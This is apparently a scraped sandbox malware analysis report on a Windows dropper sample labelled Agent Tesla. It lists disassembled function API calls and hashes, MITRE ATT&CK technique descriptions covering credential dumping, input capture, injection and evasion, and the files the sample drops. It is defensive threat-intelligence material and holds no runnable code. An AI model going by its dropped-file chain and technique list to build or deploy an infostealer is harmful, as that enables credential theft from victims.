Instruction ID: de25dd94fbdf78f8a1e668cfdb8bb706c22186d905c146e235ac19107893cb61
Opcode Fuzzy Hash: f2a64bd8e0af24b91cb871e90705f05e4ec4141a71d36be1446cc7c522c39933
Instruction Fuzzy Hash: A6316172A00208EFEB11EFA8C884AAE77ECEB49314FA85566F906D3A50D734D951CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0298FACC Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 0298FAED

Part of subcall function 0298F6D0: VariantClear.OLEAUT32(?), ref: 0298F6DF

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: bf4df6483d4f6393cc1acff3c488aecfd3cf0ee4d11dae06258e75e688600ed7
Instruction ID: e47f99cadea81db31516a5ffe0036ce099c7aac7ab77ea273d5be9aedfd377a3
Opcode Fuzzy Hash: bf4df6483d4f6393cc1acff3c488aecfd3cf0ee4d11dae06258e75e688600ed7
Instruction Fuzzy Hash: 7311862070021057CB24BF68C890A6763EAEF8579079CB86AA44E8BA15DB34CC41CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0298738A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 029873CB

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
Instruction ID: cb04298ec1b27ed9a845fa02d7853e875683c050aec3d26f2d90f8f5d548bfd2
Opcode Fuzzy Hash: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
Instruction Fuzzy Hash: 5AF09DB6700158BF9B80EE9DDC80EDBB7ECEB8C2A4B154165FA0CD7200D630ED108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0298738C Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 029873CB

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
Instruction ID: e463a544bf800d214341687624634b104f4c43ef995c50273294bf92cf68ff5c
Opcode Fuzzy Hash: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
Instruction Fuzzy Hash: CAF09DB6600158BF8B80EE9DDC80EDBB7ECEB8C2A4B154165FA0CD7200D630ED108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 029E95F8 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,029E967E), ref: 029E9612

Part of subcall function 029C7420: GetCurrentProcessId.KERNEL32(?,00000000,029C7598), ref: 029C7441
Part of subcall function 029C7420: GetCurrentThreadId.KERNEL32 ref: 029C748F
Part of subcall function 029C7420: GlobalAddAtomA.KERNEL32(00000000), ref: 029C74C5
Part of subcall function 029C7420: RegisterClipboardFormatA.USER32(00000000), ref: 029C74DB
Part of subcall function 029C7420: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,029C7598), ref: 029C755F
Part of subcall function 029C7420: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 029C7570

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: Current$AddressAtomClipboardFormatGlobalHandleModuleProcProcessRegisterThreadVersion
String ID:
API String ID: 2893432522-0
Opcode ID: 79db2cd99d03b3e13f471f6fcf823a6bc353cb294273048d75a0599d0f273da5
Instruction ID: 7987eacda50cae04e41d5df8537c1e904976ce419c5de3bcc1b7a6a28b5d2cb3
Opcode Fuzzy Hash: 79db2cd99d03b3e13f471f6fcf823a6bc353cb294273048d75a0599d0f273da5
Instruction Fuzzy Hash: 41F068B969E1409FE723FF68EE8186577AAE7CA7103924835D40187618CD749C61CE64

Uniqueness

Uniqueness Score: -1.00%

Function 0298D570 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B0EB38,?,029DD7E7,ScanBuffer,02A169E4,029E7AE0,OpenSession,02A169E4,029E7AE0,ScanBuffer,02A169E4,029E7AE0,OpenSession), ref: 0298D587

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: af4efeb3384cbdb9fbad43840b29a484288c8f23093bd2a35eb8551050a3dc1a
Instruction ID: 6055ef514eefccb2f46009b0585056bc9a355a9c113676b78bfa5076e4199b7a
Opcode Fuzzy Hash: af4efeb3384cbdb9fbad43840b29a484288c8f23093bd2a35eb8551050a3dc1a
Instruction Fuzzy Hash: 77D022A2B006542BE700F16C0C818FB32CE8FC8720F48013A7999CB3C0FA908E100BD2

Uniqueness

Uniqueness Score: -1.00%

Function 02985058 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02984F76
SysFreeString.OLEAUT32 ref: 02985075

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 478ca0e79f943246b1b3029f9eea381ecbc249769f11debf24d3064ab636df96
Instruction ID: 1365759023c01d52c5beac60479d1de1b1d67bf2a061e51436e1a178be79373a
Opcode Fuzzy Hash: 478ca0e79f943246b1b3029f9eea381ecbc249769f11debf24d3064ab636df96
Instruction Fuzzy Hash: 8CC08CBD10A3036DEF143F708900A3A276DAEC1200B8C147DEC00C8041E738C463EC22

Uniqueness

Uniqueness Score: -1.00%

Function 02981668 Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004), ref: 0298167E

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4a5d77be938861860ec41a2c60854bf6397e675a317a3c5d10cbeaca1c32830c
Instruction ID: 863dfe891d6a9f96d84764fbab150b600edea9991181141705e8f5abfc81718f
Opcode Fuzzy Hash: 4a5d77be938861860ec41a2c60854bf6397e675a317a3c5d10cbeaca1c32830c
Instruction Fuzzy Hash: 64F049F0B403008FDB06DF799D40312BAD6EB89354F148579D609DB788EB7188028B00

Uniqueness

Uniqueness Score: -1.00%

Function 0298171E Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02981740

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 501ba90d202f0c4227ea0e75cc03c58bd569c0bda4b528efe4d6710d20a29d63
Instruction ID: f449d0ac567f65c3a71cfd6c1896faea99e973e3abbf94a51e09b22ce948e075
Opcode Fuzzy Hash: 501ba90d202f0c4227ea0e75cc03c58bd569c0bda4b528efe4d6710d20a29d63
Instruction Fuzzy Hash: 33F09AB2B40656ABD7119E5A9C90B83BB94FF40360F190939EA4D97344DB71E812CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02981782 Relevance: 1.3, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 029817A0

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 41c53e77730eaf3576ffcb5068da0b33a1fee8a52350b1bd2d523e2eb39b8ee8
Instruction ID: a8446b524ca4b8a68c4f0d488b4f686dc244b0726124c53d876458a789060018
Opcode Fuzzy Hash: 41c53e77730eaf3576ffcb5068da0b33a1fee8a52350b1bd2d523e2eb39b8ee8
Instruction Fuzzy Hash: E0E04F713003416ED7102E7D5C407526AD9AF89771F2C4A69F559DB2D1D760E8418760

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Clmgncrs.url

C:\Users\Public\Libraries\Clmgncrs.PIF

C:\Users\Public\Libraries\ClmgncrsO.bat

C:\Users\Public\Libraries\KDECO.bat

C:\Users\Public\Libraries\Null

C:\Users\Public\Libraries\easinvoker.exe

C:\Users\Public\Libraries\netutils.dll

C:\Users\Public\Libraries\srcngmlC.pif

C:\Users\Public\Libraries\truesight.sys

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Function 029F7E4C Relevance: 43.5, APIs: 8, Strings: 16, Instructions: 1478
nativethreadprocessCOMMON

Function 029D5DDC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Function 029EFD38 Relevance: 12.1, APIs: 8, Instructions: 65
librarynativeloaderCOMMON

Function 029EFCD8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
librarynativeloaderCOMMON

Function 029EFB80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
librarymemorynativeCOMMON

Function 02A2B768 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre